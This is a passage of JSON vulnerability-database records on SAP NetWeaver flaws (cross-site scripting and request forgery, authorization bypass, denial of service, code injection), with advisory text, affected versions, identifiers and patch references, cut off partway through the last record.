"id": "17469898-1f4c-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "15856548-1f4c-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
},
{
"author": "IVD",
"id": "17469898-1f4c-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "15856548-1f4c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "17469898-1f4c-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver has a security vulnerability. The SAP NetWeaver application has a cross-site request forgery vulnerability that allows an attacker to build a malicious URI, entice a user to resolve, and perform malicious operations in the target user context. There is a security hole in SAP NetWeaver, and the Mobile RFID application lacks sufficient filtering for some of the inputs, which can lead to cross-site scripting attacks. SAP Netweaver is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability because it fails to properly sanitize user-supplied input. \nAn attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete or modify sensitive information, or perform unauthorized actions. Other attacks are also possible. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Cross-Site Scripting and Request Forgery\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA51248\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/51248/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51248\n\nRELEASE DATE:\n2012-11-14\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/51248/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/51248/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51248\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nERPScan has reported two vulnerabilities in SAP NetWeaver, which can\nbe exploited by malicious people to conduct cross-site scripting and\nrequest forgery attacks. \n\n1) Certain unspecified input is not properly sanitised within the\nMobile RFID application before being returned to the user. \n\n2) The application allows users to perform certain actions via HTTP\nrequests without performing any validity checks to verify the\nrequests. This can be exploited to perform certain unspecified\nactions if a logged-in user visits a malicious web site. \n\nThe vulnerability is reported in version 7.x. Other versions may also\nbe affected. \n\nSOLUTION:\nReportedly fixes have been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\n1) Alexander Polyakov, ERPScan\n2) Alexey Tyurin, ERPScan\n\nORIGINAL ADVISORY:\nSAP:\nhttps://service.sap.com/sap/support/notes/1669031\nhttps://service.sap.com/sap/support/notes/1728500\n\nERPScan (DSECRG-12-041, DSECRG-12-042):\nhttp://erpscan.com/advisories/dsecrg-12-041-sap-netweaver-mobile-xss/\nhttp://erpscan.com/advisories/dsecrg-12-042-sap-netweaver-soap-rfc-csrf/\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-6522"
},
{
"db": "CNVD",
"id": "CNVD-2012-6521"
},
{
"db": "BID",
"id": "56516"
},
{
"db": "IVD",
"id": "15856548-1f4c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "17469898-1f4c-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "118082"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "56516",
"trust": 2.1
},
{
"db": "SECUNIA",
"id": "51248",
"trust": 1.3
},
{
"db": "CNVD",
"id": "CNVD-2012-6522",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-6521",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201211-270",
"trust": 0.6
},
{
"db": "IVD",
"id": "15856548-1F4C-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "17469898-1F4C-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "118082",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "15856548-1f4c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "17469898-1f4c-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-6522"
},
{
"db": "CNVD",
"id": "CNVD-2012-6521"
},
{
"db": "BID",
"id": "56516"
},
{
"db": "PACKETSTORM",
"id": "118082"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-270"
}
]
},
"id": "VAR-201211-0449",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "15856548-1f4c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "17469898-1f4c-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-6522"
},
{
"db": "CNVD",
"id": "CNVD-2012-6521"
}
],
"trust": 2.115214636666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 1.6
}
],
"sources": [
{
"db": "IVD",
"id": "15856548-1f4c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "17469898-1f4c-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-6522"
},
{
"db": "CNVD",
"id": "CNVD-2012-6521"
}
]
},
"last_update_date": "2022-05-17T22:39:28.252000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP Netweaver Cross-Site Request Forgery Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/25092"
},
{
"title": "Patch for SAP Netweaver Mobile RFID Application Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/25091"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-6522"
},
{
"db": "CNVD",
"id": "CNVD-2012-6521"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.2,
"url": "http://secunia.com/advisories/51248/http"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/56516"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "http://erpscan.com/advisories/dsecrg-12-042-sap-netweaver-soap-rfc-csrf/"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1728500"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/51248/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1669031"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://erpscan.com/advisories/dsecrg-12-041-sap-netweaver-mobile-xss/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/51248/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51248"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-6522"
},
{
"db": "CNVD",
"id": "CNVD-2012-6521"
},
{
"db": "BID",
"id": "56516"
},
{
"db": "PACKETSTORM",
"id": "118082"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-270"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "15856548-1f4c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "17469898-1f4c-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-6522"
},
{
"db": "CNVD",
"id": "CNVD-2012-6521"
},
{
"db": "BID",
"id": "56516"
},
{
"db": "PACKETSTORM",
"id": "118082"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-270"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-16T00:00:00",
"db": "IVD",
"id": "15856548-1f4c-11e6-abef-000c29c66e3d"
},
{
"date": "2012-11-16T00:00:00",
"db": "IVD",
"id": "17469898-1f4c-11e6-abef-000c29c66e3d"
},
{
"date": "2012-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-6522"
},
{
"date": "2012-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-6521"
},
{
"date": "2012-11-14T00:00:00",
"db": "BID",
"id": "56516"
},
{
"date": "2012-11-14T01:39:26",
"db": "PACKETSTORM",
"id": "118082"
},
{
"date": "2012-11-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201211-270"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-6522"
},
{
"date": "2012-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-6521"
},
{
"date": "2012-11-14T00:00:00",
"db": "BID",
"id": "56516"
},
{
"date": "2012-11-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201211-270"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201211-270"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver Cross-Site Request Forgery Vulnerability",
"sources": [
{
"db": "IVD",
"id": "15856548-1f4c-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-6522"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201211-270"
}
],
"trust": 0.6
}
}
var-201702-1124
Vulnerability from variot
SAP Netweaver is prone to an authorization-bypass vulnerability. Attackers can exploit this issue to gain unauthorized access and obtain sensitive information. This may aid in further attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201702-1124",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "96203"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "96203"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver is prone to an authorization-bypass vulnerability.\nAttackers can exploit this issue to gain unauthorized access and obtain sensitive information. This may aid in further attacks.",
"sources": [
{
"db": "BID",
"id": "96203"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "96203",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "96203"
}
]
},
"id": "VAR-201702-1124",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:47:54.798000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://erpscan.com/press-center/blog/sap-cyber-threat-intelligence-report-february-2017/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2408892"
}
],
"sources": [
{
"db": "BID",
"id": "96203"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "96203"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-02-14T00:00:00",
"db": "BID",
"id": "96203"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-07T04:02:00",
"db": "BID",
"id": "96203"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "96203"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver Remote Authorization Bypass Vulnerability",
"sources": [
{
"db": "BID",
"id": "96203"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "96203"
}
],
"trust": 0.3
}
}
var-201710-1476
Vulnerability from variot
SAP Netweaver is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause denial-of-service conditions.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201710-1476",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "101207"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported the issue.",
"sources": [
{
"db": "BID",
"id": "101207"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver is prone to a denial-of-service vulnerability.\nAn attacker can exploit this issue to cause denial-of-service conditions.",
"sources": [
{
"db": "BID",
"id": "101207"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "101207",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "101207"
}
]
},
"id": "VAR-201710-1476",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:03:13.892000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2480857"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/10/10/sap-security-patch-day-october-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "101207"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "101207"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-10T00:00:00",
"db": "BID",
"id": "101207"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-10T00:00:00",
"db": "BID",
"id": "101207"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "101207"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver Web Dynpro ABAP Denial of Service Vulnerability",
"sources": [
{
"db": "BID",
"id": "101207"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "101207"
}
],
"trust": 0.3
}
}
var-201712-0108
Vulnerability from variot
SAP NetWeaver Internet Transaction Server (ITS), SAP Basis from 7.00 to 7.02, 7.30, 7.31, 7.40, from 7.50 to 7.52, allows an attacker with administrator credentials to inject code that can be executed by the application and thereby control the behavior of the application. SAP Netweaver is prone to a vulnerability that lets attackers inject and execute arbitrary code. Successful exploits may allow an attacker to inject and run arbitrary code or obtain sensitive information that may aid in further attacks. Failed exploit attempts may result in a denial-of-service condition
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201712-0108",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver internet transaction server",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "business application software integrated solution",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.30"
},
{
"model": "business application software integrated solution",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.31"
},
{
"model": "business application software integrated solution",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "business application software integrated solution",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "business application software integrated solution",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.00"
},
{
"model": "business application software integrated solution",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.52"
},
{
"model": "business application software integrated solution",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.02"
},
{
"model": "basis",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.00 to 7.02"
},
{
"model": "basis",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.30"
},
{
"model": "basis",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.31"
},
{
"model": "basis",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.40"
},
{
"model": "basis",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.50 to 7.52"
},
{
"model": "netweaver internet transaction server",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "102143"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011211"
},
{
"db": "NVD",
"id": "CVE-2017-16682"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-418"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_internet_transaction_server:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
